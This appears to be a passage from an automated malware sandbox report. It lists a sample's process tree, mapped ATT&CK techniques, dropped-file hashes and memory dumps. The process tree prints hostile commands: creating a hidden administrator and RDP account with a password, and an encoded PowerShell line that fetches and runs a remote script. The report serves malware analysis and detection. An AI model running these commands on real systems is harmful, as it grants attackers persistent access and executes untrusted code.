        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:2592
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1644
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:4360

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:2720
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1596
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:4684

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 4Sz1A8yR /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4328
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 4Sz1A8yR /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 4Sz1A8yR /add
    3⤵
    PID:4444

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4776
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:2244
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:2372

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" MKDQUQPQ$ /ADD
1⤵
PID:2508
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" MKDQUQPQ$ /ADD
  2⤵
  PID:4932
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKDQUQPQ$ /ADD
    3⤵
    PID:4044

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:4520
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:1056
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:4284

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 4Sz1A8yR
1⤵
PID:1240
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 4Sz1A8yR
  2⤵
  PID:1612
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 4Sz1A8yR
    3⤵
    PID:4416

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:4188
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:4252

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:1536
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4116

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:3236
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:3244
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESC18B.tmp

Filesize
1KB

MD5
e3815705d76a68047e55814f7d5dbaf9

SHA1
267f9416e89c2ba31283a90d9deb64588bb7d4d3

SHA256
ec768867e6e60624cd5617c61ec926319e8049929042f684501e5a223f22ad7d

SHA512
99631538c17ea18a5798dadfe478ec38c224bf89da5a829fa999ae04368d531282b04df89204238eacc213a3bf3016d994c6d836b66a8689a65674ffa8467058

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_psfryoco.prm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

Filesize
2.5MB

MD5
f49b7639c86923a9507b594feb5df523

SHA1
e3a058aa2ae06ee0d8e1c3d47d790181651744a1

SHA256
f92f29a5e41c25e32ad83a71e9e2a54c87f91c966cb90fdd3b1289bad824b021

SHA512
c68858888ea64affa95b3e51e3d3ef43d12e8628f5a09fdb5f33319f1cb5a23df9506a2dfb797445f77cf7120e79f9d0c9ddd25a567dab81cce0c3751903c804

Download Submit
C:\Users\Admin\AppData\Local\Temp\lkogmnrw\lkogmnrw.dll

Filesize
3KB

MD5
04b4c02e93c2eb96b32dc39d41edb097

SHA1
1482759b3e231725cbf8f62234995d288e71fbfc

SHA256
88af9bb25ad92529b7adc12437cc504c3236713ad018c5dc1b7751beb5c8c061

SHA512
adb716991337c4c107706fe28d015ad61f6856d7459d5e55b6e7cb2084ac7942fbc34d3686003848733b73a00b5a5cce090dc3b27ff703d3d556bc65b411c6a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
28d9755addec05c0b24cca50dfe3a92b

SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3

SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
5410b592605e57a4a01c66b0a1f0d10d

SHA1
afa4acf032d537dd46e997891fc7f9bba9555679

SHA256
e39445c5f61c431be3b0ce753487e9a6439b5bfb813cf21116b77fb7d0696fa9

SHA512
4ce9816c61e58834c1713d0abcf6305d565b7a52c1d2d2f63d8b7c5b69314d959205ea70af084ef74759820114c8b938800513e0dda43d699f0454189b5fbdca

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
37b7b51385d6b857d082976c035c86e0

SHA1
c2ec7d74e7d555375cdcca0407237dd3e7db2a24

SHA256
a66a31069c3d37207c33b0dc1a9a0d1bbe85a0dd78168f598edfebe07c3d4e22

SHA512
8bc897adf02406478a4bc6a24efcfcd699e2fa7aa7e82c8bd6d05f6b5922143866039d533ae8730dbd0d76c7745cbda86d4c4174a298bf29be1a80c7a1eaf403

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI42FF.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lkogmnrw\CSC12C5380FCF2943D69BB0C3F8A9C9346.TMP

Filesize
652B

MD5
20ba4d8c7683cf1eadc75e0e638084b3

SHA1
abf1449091213841b6c30f8104112ef15481545f

SHA256
b189aab32613cb0abd7b89627c9bb370ee8dfa30f111507bc282786326036c01

SHA512
393b539501698fb0c3b8bcceabb0374735bbe45ef5b592a038d2d346725c359b227397e2773f85bbff8badb6e1ac642fbdd4d633400afc073463324306688b5b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lkogmnrw\lkogmnrw.0.cs

Filesize
424B

MD5
9f8ab7eb0ab21443a2fe06dab341510e

SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165

SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lkogmnrw\lkogmnrw.cmdline

Filesize
369B

MD5
7e55f233a3c5201064cc10cdb6d39f4e

SHA1
9dc4e225b7d505fc2e4148358633473aa6af6acc

SHA256
7be30211e1ec8bb275c99553f1b72d7636c72487c6d296fcea33c95c1fe81495

SHA512
645ea7a8de8bd1e72883329da1c4073cb9d625feddcfa17eab41742a7a28edf839695f98c38ecb802bd0d31ab89bbe48700736c113be2a50c4ca5a899d75a95d

Download Submit
memory/1004-41-0x00007FFA69300000-0x00007FFA69DC1000-memory.dmp

Filesize
10.8MB

Download
memory/1004-56-0x00007FFA69300000-0x00007FFA69DC1000-memory.dmp

Filesize
10.8MB

Download
memory/1004-54-0x000001E120440000-0x000001E120450000-memory.dmp

Filesize
64KB

Download
memory/1004-42-0x000001E120440000-0x000001E120450000-memory.dmp

Filesize
64KB

Download
memory/2376-3-0x00007FFA69300000-0x00007FFA69DC1000-memory.dmp

Filesize
10.8MB

Download
memory/2376-2-0x0000022576F30000-0x0000022577334000-memory.dmp

Filesize
4.0MB

Download
memory/2376-6-0x0000022576B10000-0x0000022576B20000-memory.dmp

Filesize
64KB

Download
memory/2376-167-0x00007FFA69300000-0x00007FFA69DC1000-memory.dmp

Filesize
10.8MB

Download
memory/2376-166-0x00007FF767DF0000-0x00007FF768596000-memory.dmp

Filesize
7.6MB

Download
memory/2376-40-0x00007FF767DF0000-0x00007FF768596000-memory.dmp

Filesize
7.6MB

Download
memory/2376-1-0x00007FF767DF0000-0x00007FF768596000-memory.dmp

Filesize
7.6MB

Download
memory/2376-4-0x0000022576B10000-0x0000022576B20000-memory.dmp

Filesize
64KB

Download
memory/2376-52-0x00000225701E0000-0x0000022570934000-memory.dmp

Filesize
7.3MB

Download
memory/2376-53-0x00007FFA69300000-0x00007FFA69DC1000-memory.dmp

Filesize
10.8MB

Download
memory/2376-0-0x00000225701E0000-0x0000022570934000-memory.dmp

Filesize
7.3MB

Download
memory/2376-55-0x0000022576B10000-0x0000022576B20000-memory.dmp

Filesize
64KB

Download
memory/2376-5-0x0000022576B10000-0x0000022576B20000-memory.dmp

Filesize
64KB

Download
memory/2376-57-0x0000022576B10000-0x0000022576B20000-memory.dmp

Filesize
64KB

Download
memory/2376-58-0x0000022576B10000-0x0000022576B20000-memory.dmp

Filesize
64KB

Download
memory/2908-83-0x0000020A24C10000-0x0000020A24C20000-memory.dmp

Filesize
64KB

Download
memory/2908-71-0x00007FFA69300000-0x00007FFA69DC1000-memory.dmp

Filesize
10.8MB

Download
memory/2908-82-0x0000020A24C10000-0x0000020A24C20000-memory.dmp

Filesize
64KB

Download
memory/2908-84-0x0000020A24C10000-0x0000020A24C20000-memory.dmp

Filesize
64KB

Download
memory/2908-85-0x00007FFA69300000-0x00007FFA69DC1000-memory.dmp

Filesize
10.8MB

Download
memory/3312-69-0x0000014EF41E0000-0x0000014EF41F0000-memory.dmp

Filesize
64KB

Download
memory/3312-70-0x00007FFA69300000-0x00007FFA69DC1000-memory.dmp

Filesize
10.8MB

Download
memory/3312-68-0x00007FFA69300000-0x00007FFA69DC1000-memory.dmp

Filesize
10.8MB

Download
memory/3500-157-0x00007FFA69300000-0x00007FFA69DC1000-memory.dmp

Filesize
10.8MB

Download
memory/3500-123-0x0000021355C00000-0x0000021355C10000-memory.dmp

Filesize
64KB

Download
memory/3500-122-0x0000021355C00000-0x0000021355C10000-memory.dmp

Filesize
64KB

Download
memory/3500-121-0x0000021355C00000-0x0000021355C10000-memory.dmp

Filesize
64KB

Download
memory/3500-120-0x00007FFA69300000-0x00007FFA69DC1000-memory.dmp

Filesize
10.8MB

Download
memory/4640-19-0x00007FFA69300000-0x00007FFA69DC1000-memory.dmp

Filesize
10.8MB

Download
memory/4640-87-0x0000013752CB0000-0x0000013752CC0000-memory.dmp

Filesize
64KB

Download
memory/4640-21-0x0000013752CB0000-0x0000013752CC0000-memory.dmp

Filesize
64KB

Download
memory/4640-35-0x0000013752DF0000-0x0000013752DF8000-memory.dmp

Filesize
32KB

Download
memory/4640-92-0x0000013752CB0000-0x0000013752CC0000-memory.dmp

Filesize
64KB

Download
memory/4640-89-0x0000013752CB0000-0x0000013752CC0000-memory.dmp

Filesize
64KB

Download
memory/4640-88-0x00007FFA773F0000-0x00007FFA77409000-memory.dmp

Filesize
100KB

Download
memory/4640-20-0x0000013752CB0000-0x0000013752CC0000-memory.dmp

Filesize
64KB

Download
memory/4640-14-0x0000013752E00000-0x0000013752E22000-memory.dmp

Filesize
136KB

Download
memory/4640-81-0x00007FFA69300000-0x00007FFA69DC1000-memory.dmp

Filesize
10.8MB

Download
memory/4640-159-0x0000013752CB0000-0x0000013752CC0000-memory.dmp

Filesize
64KB

Download
memory/4640-163-0x00007FFA773F0000-0x00007FFA77409000-memory.dmp

Filesize
100KB

Download
memory/4640-164-0x00007FFA69300000-0x00007FFA69DC1000-memory.dmp

Filesize
10.8MB

Download
memory/4640-39-0x000001376BA00000-0x000001376BC0A000-memory.dmp

Filesize
2.0MB

Download
memory/4640-38-0x000001376B670000-0x000001376B7E6000-memory.dmp

Filesize
1.5MB

Download